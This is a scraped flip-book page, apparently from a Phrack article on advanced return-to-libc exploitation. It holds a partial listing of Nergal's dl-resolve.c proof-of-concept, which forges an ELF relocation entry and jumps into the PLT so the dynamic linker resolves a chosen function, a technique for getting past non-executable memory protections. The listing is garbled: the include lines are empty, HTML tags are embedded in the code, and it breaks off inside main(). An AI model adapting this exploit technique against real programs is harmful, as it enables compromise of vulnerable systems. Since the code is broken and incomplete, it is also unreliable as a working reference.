Advanced Return to libc Exploits
Advanced Return to libc Exploits
Advanced Return to libc Exploits
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
phrack-nergal/dl-resolve.c !d5fc32b7<br />
/* by Nergal */<br />
#include <br />
#include <br />
#include <br />
#include <br />
#define STRTAB 0x8048240<br />
#define SYMTAB 0x8048170<br />
#define JMPREL 0x8048354<br />
#define VERSYM 0x80482f8<br />
#define PLT_SECTION "0x080483cc"<br />
void graceful_exit()<br />
{<br />
exit(123);<br />
}<br />
void doit(int offset)<br />
{<br />
int res;<br />
__asm__ volatile ("<br />
pushl $0x01011000<br />
pushl $0xffffffff<br />
pushl $0x00000032<br />
pushl $0x00000007<br />
pushl $0x01011000<br />
pushl $0xaa011000<br />
pushl %%ebx<br />
pushl %%eax<br />
pushl $" PLT_SECTION "<br />
ret"<br />
:"=a"(res)<br />
:"0"(offset),<br />
"b"(graceful_exit)<br />
);<br />
}<br />
/* this must be global */<br />
Elf32_Rel reloc;<br />
#define ANYTHING 0xfe<br />
#define RQSIZE 60000<br />
int<br />
main(int argc, char **argv)<br />
{<br />
unsigned int reloc_offset;<br />
unsigned int real_index;<br />
char symbol_name[16];<br />
int dummy_writable_int;<br />
char *tmp = malloc(RQSIZE);<br />
Elf32_Sym *sym;<br />
unsigned short *null_short = (unsigned short*) tmp;<br />
/* create a null index in<strong>to</strong> VERSYM */
Change language